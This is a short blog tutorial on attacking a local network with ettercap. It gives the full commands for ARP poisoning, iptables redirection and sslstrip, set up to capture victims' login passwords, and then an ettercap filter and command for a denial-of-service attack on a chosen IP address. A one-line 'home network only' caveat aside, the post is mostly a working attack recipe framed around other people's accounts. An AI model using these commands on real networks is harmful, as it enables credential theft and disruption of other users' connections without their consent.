Man In the Middle Attack with Ettercap

Only test this on your home network no where else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted http traffic. I have done this on wired LANs using Backtrack. I have yet to get it to work wireless.

To begin we want to enable packet forwarding with this command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then cat the file to see if it is enabled or not. The command output of 1 meaning enabled and 0 meaning not enabled.

cat /proc/sys/net/ipv4/ip_forward

We will now edit our etter.conf configuratin file to use ip tables. In backtrack the file is located /etc/etter.conf
Uncomment the two commented lines following the statement: if you use iptables by removing the two bottom comment hashes you see below((remove the two bright red things) but make sure to leave the one beside the words "if you use ip tables":

#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

In the same file also change ec_uid and ec_gid numbers to zero so Ettercap runs as admin.

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Now use this iptables command to adjust the nat table to route tcp traffic from 80 to 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Once we have scanned the network for targets and are aware of what IP addresses belongs to what we can begin the poisoning by Becomeing Man in the middle. The following will start ettercap using a range of ip addresses along with the autoadd plugin which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5

sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoadd
or less specific. This poisons everyone in subnet but be careful this can bring a network to a crawl:
ettercap -TqM ARP:REMOTE // //

Now tell sslstrip to listen(-l) on p 8080:
sslstrip -a -l 8080

Now watch people's hotmail,facebook and any other passwords that are suppsoedly protected by ssl roll in as they login. Ettercap will display the output. Now lets dig deeper and manipulate people's packets as they are routed through our computer.

DOS Attacking with Ettercap

First off always re-enable packetforwarding because by default it will turn off when you stop an Ettercap poison. Here is the command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now lets do a DOS attack with ettercap. First thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft

Put these lines of code in it but make sure to change both “Target IP” fields to that of your victim.

if (ip.src == ‘Target IP’ || ip.dst == ‘Target IP’) {
drop();
kill();
msg(“Packet Dropped\n”);
}

Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:etterfilter dos.eft -o dos.ef

Lastly we become man in the middle.
-F specifies what filter we want to use. In this case it’s dos.ef
I was targeting 192.168.1.112 so I chose it for this example:

ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)

You should see Ettercap displaying lots of “Packet Dropped” messages. ;-)

No comments:

Post a Comment

Snow-Falling-Effect